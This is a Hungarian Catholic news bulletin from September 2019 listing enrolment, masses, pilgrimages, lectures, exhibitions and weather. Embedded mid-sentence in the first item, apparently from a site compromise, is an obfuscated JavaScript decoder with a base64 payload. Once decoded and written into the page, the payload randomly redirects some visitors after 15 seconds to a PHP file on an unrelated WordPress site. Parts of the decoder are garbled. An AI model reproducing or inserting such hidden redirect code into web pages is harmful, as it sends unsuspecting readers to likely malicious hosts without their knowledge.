2019. szeptember 12. – Hírek és programajánló

H Í R E K   D É L B E N

Elkezdődött a beiratkozás a teológia karon
Didaktikai teológia szakra iratkozhatnak az érettségi oklevéllel rendelkező tanulni vágyók szeptember 11-18. között Kolozsváron. A Római Katolikus Teológia Kar minden diák számára bentlakást biztosít. Azok a diákok, akik a teológia mellett más szakon is tanulnának, magánösztöndíjat igényelhetnek, ami a másik szak tfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andíját fedezi. Több információ a plébániákon, a 0264-590715 telefonszámon, a kar honlapján vagy a facebook oldalán található.

Előadás Sepsiszentgyörgyön
„A plasztikai sebészet egy olyan szakterület, ami a funkció és a forma harmóniájának elérésére törekszik. A rekonstrukciós ága főként a betegség vagy baleseti traumás sérülésekre fókuszál, míg az esztétikai ága a test karaktervonásait alakítja át.” A Máltai Szeretetszolgálat sepsiszentgyörgyi fiókszervezete ingyenes előadást szervez ma délután 6 órától. Meghívott Dr. Jankó Botond a Csíkszeredai Megyei Sürgősségi Kórház plasztikai sebésze, aki a szakterület alapjaiba avatja be az érdeklődőket, helyszín a Szeretetszolgálat új előadó terme.

Virrasztás a székesegyházban
A Boldogságos Szűz Mária fatimai jelenésének emlékére holnap délután 6 órakor szentségimádást, ezt követően 7 órakor szentmisét tartanak a nagyváradi római katolikus székesegyházban, a szentmise után pedig körmenetet. A szentmise főcelebránsa és szónoka Vakon Zsolt püspöki titkár lesz.

Váradszőllősi Zenei Estek
Holnap este 7 órakor folytatódik a Váradszőllősi Zenei Estek című programsorozat idei évada. Az est meghívott előadója Csibi András gyergyószárhegyi orgonaművész.

Képzőművészeti kiállítás
Az Ars Sacra egyesület és a kolozsvári Szent Mihály templom közös szervezésében kortárs művészek kiállítása lesz látható Kolozsváron a Iuliu Maniu utca 4 szám alatti kiállítóteremben. A kiállítást szeptember 14-én, szombaton délután 5 órától Veres Stelián plébános-helyettes nyitja meg, közreműködnek Bodó Márta és Potyó István. A tárlat október 6-ig lesz látogatható.

Üdvözlégy Szent Kereszt!
Szeptember 14-én, szombaton ünneplik a biharkeresztesi plébániatemplom búcsúját. Az ünnep keretén belül helyi idő szerint délután 4 órakor Fejes Rudolf Anzelm váradhegyfoki premontrei apát megáldja a város határában felállított keresztet. Az ünnepről hamarosan bővebben is hallhatnak.

Templombúcsú a Vártemplomban
Szeptember 15-én, vasárnap tartják a Fájdalmas Szűzanya oltalma alatt álló nagyváradi Vártemplom búcsúját. A délután egy órakor kezdődő szlovák nyelvű szentmise főcelebránsa és szónoka Juhaňak Marian, a besztercebányai egyházmegye (Szlovákia) papja.

Cserkész toborzó
„A cserkészet nem valami homályos vagy bonyolult tudomány, inkább mosolygós játék... nevelő hatású, és alkalmas arra, hogy akárcsak az irgalmasság, gazdagítsa azt is, aki ad, és azt is, aki kap.” Az I. Rákóczi György cserkész csapat szeretettel meghív minden 8-11 év közötti gyereket és szüleiket, akik szeretnének ízelítőt kapni a cserkészéletről, a Kanonok Sor 17 szám alá, szeptember 15-én, vasárnap délután 4 órára. Érdeklődni lehet a 0723-690910-es telefonszámon.

Papi szenátus őszi ülése
A Gyulafehérvári Főegyházmegye Papi Szenátusának újraválasztását követően, szeptember 24-én, kedden az alvinci Pongrácz Szent Istvánról nevezett tanulmányi házba tartják a szenátus alakuló és egyben őszi rendes ülését. Fő napirendi pont: A legújabb szentszéki kérések és azok alkalmazása  főegyházmegyénkben. A Paptestvérek is beküldhetik javaslataikat, meglátásaikat a napirenddel kapcsolatban. Esetleg más, fontos témát is javasolhatnak tárgyalásra, a szenátusi gyűlésre. Ezeket írásban terjesszék elő az érseki irodának, legkésőbb szeptember 20-ig.

Élet a Lélekben szemináriumok
A sepsiszentgyörgyi Krisztus Király altemplomában szeptember 23-án este 7 órától, a csíkszeredai Szent Ágoston templomban szeptember 26-án este fél nyolctól kezdődik az Élet a Lélekben szeminárium. A szeminárium segítséget tud nyújtani, hogy teljes szívvel éljük az evangéliumot, segít az Istennel való bensőséges kapcsolatban és a hitben való növekedésben. Az evangéliumi hit az egyetlen orvosság a mai kor betegségeire: szorongásokra, reménytelenségre, erőtlenségre és közömbösségre. Mindenkit várnak aki meg
akarja tapasztalni a hit elevenségét, a Jézussal való élet örömét és Isten közelségét, szeretetét.
Bejelentkezni a szemináriumra a kezdés időpontján lehet.

Időjárás: A mai napon a napos időt délen és nyugaton zavarhatja több felhő. Kisebb zápor, esetleg zivatar a nyugati tájakon alakulhat ki. Élénk széllökések kísérhetik az északnyugati szelet. A hűvös hajnalt követően, délután 23-29 fokra kell számítanunk. A hétvégén előreláthatólag egy hidegfront hozhat néhány fokos lehűlést.

H Í R E K   R E G G E L

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán a homoróddaróci templomban tartanak örökös szentségimádási napot. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, fejezzük ki örömünket, hálánkat és imádatunkat.

Ifjúsági szentségimádás
Ma este 7 órától „Jöjjetek hozzám mindnyájan, én felüdítelek titeket” mottóval ifjúsági szentségimádást tartanak a nagyváradi Szent Katalin-telepi plébániatemplomban.
Keressük a Krisztus jelenlétében fellelhető örömet és békét. A szentségimádás után kötetlen beszélgetés, teázás lesz a plébánia közösségi termébe.

Mária neve búcsúk
A gyulafehérvári egyházmegyében a csíksomlyói kegytemplomban ma ünneplik Szűz Mária szent neve búcsúját A szentmisék reggel 8, délelőtt fél 11 és este 7 órakor lesznek. A fél 11 órakor kezdődő szentmisét Göthér Gergely csíksomlyói plébános tartja.
A Kőhalomhoz tartozó homorródaróci filíában ma, déli 12 órakor kezdődik a búcsú. A szentbeszédet Máthé Vilmos, a brassói Szent Kereszt felmagasztalása egyházközség plébános tartja.
Székelyszálláson szeptember 14-én, szombaton délelőtt 11 órakor mutatják be az ünnepi szentmisét. A búcsú szónoka Hajlká Attila-István imecsfalvi plébános.
Bethlenfalván szeptember 15-én, vasárnap fél 1 órakor kezdődik az idei búcsús szentmise. A szentbeszédet László Attila, a székelyudvarhelyi Szent György egyházközség plébánosa tartja.
Marosjárán, szintén szeptember 15-én, vasárnap délután 1 órakor Balla Imre, a marosvásárhelyi Keresztelő Szent János plébánia segédlelkésze lesz a búcsús szentmise szónoka.
A temesvári egyházmegyében a krassócsörgői római katolikus templomot 1846 ezen a napon szentelték fel, a titulusa azonban Szent Fülöp és Szent Jakab apostol. A közösség minden évben Szűz Mária szent neve ünnepén a templom felszentelésének évfordulóját ünnepli. Idén a szentmise déli 12 órakor kezdődik, ezt követően esperességi gyűlést tartanak.
A nagycsanádi egyházközséghez tartozó Óbéb templomát Szűz Mária Szent Neve tiszteletére szentelték. A templombúcsút szeptember 15-én, vasárnap ünnepli a közösség. A szentmisét délelőtt 11 órai kezdettel Bene Tamás nagycsanádi plébános mutatja be.                                                                                                                                                                                                                                                  Az újaradi templombúcsút szeptember 15-én, vasárnap ünnepli a közösség. A szentmisét délelőtt 10 órai kezdettel Dirschl Johann általános helynök mutatja be.

Nemzetközi Hit és Fény zarándoklat
Szeptember 14-én, szombaton nemzetközi Hit és Fény zarándoklat színhelye lesz a marosszentgyörgyi római katolikus templom. A zarándokok Magyarországról, Ukrajnából és az ország különböző településeiről – Csíkszereda, Gyergyóditró, Kolozsvár, Marosvásárhely, Nagyernye, Nagyvárad, Sepsiszentgyörgy, Szatmár – érkeznek. A 10 órakor kezdődő szentmisén, melyet Szőcs Csaba országos lelki vezető, Bálint Emil, László Szabolcs és Baricz Lajos mutat be, úrvacsoraosztás is lesz Ardai Erika lelkésznő szolgálatával.

Bérmálkozók Egyházmegyei Találkozója
„Krisztus él! Ő a mi reményünk, és csodálatos módon fiatalságot ad a világnak. Minden, amit megérint, megifjodik, új lesz, élettel telik meg.” (Ferenc pápa: Christus Vivit) Szeptember 14-én, szombaton a hegyköztótteleki vadászház közelében szervezi meg a Nagyváradi Római Katolikus Püspökség a Bérmálkozók Egyházmegyei Találkozóját. A 10 órakor kezdődő program keretében Németh István, a debrecen-nyíregyházi egyházmegye papja segíti majd a fiatalokat, hogy felnőtt keresztény hivatásukban megerősödve élő tagjai legyenek az Egyháznak.

Filmvetítés Csíksomlyón
A IV. Szakrális Művészetek hete keretében, szeptember 17-én, kedden este 6 órától Dóczy Péter filmje lesz látható a Jakab Antal Tanulmányi Házban, amely tiszteletreméltó Marton Marcell atya naplója alapján készült. A film után lelki elmélyítést vezet Darvas Piroska segítő nővér.

Ezüstmise Hargitafürdőn
A hargitafürdői Szent István templomban ünnepli pappá szentelésének 25. évfordulóját Bátor Botond pálos atya. Az ünnepi szentmise szeptember 22-én, vasárnap délután fél 1 órától kezdődik, melyen részt vesz Tamás József püspök is.

Ifjúsági szentmise
Szeptember 22-én, vasárnap délután 6 órakor az iskolás gyermekeket, fiatalokat és egyetemistákat várják a temesvár-erzsébetvárosi templomba, ahol szentmise keretében megáldják őket és az iskolatáskákat. Énekel a Juventus Salvator énekkar és a temesvári máltai önkéntes fiatalok kórusa.

Időjárás: A mai napon a napos időt délen és nyugaton zavarhatja több felhő. Kisebb zápor, esetleg zivatar a nyugati tájakon alakulhat ki. Élénk széllökések kísérhetik az északnyugati szelet. A hűvös hajnalt követően, délután 23-29 fokra kell számítanunk. A hétvégén előreláthatólag egy hidegfront hozhat néhány fokos lehűlést.

MRE - Hírszolgálat, 2019. szeptember 12.

About the author

Majoros Gabriella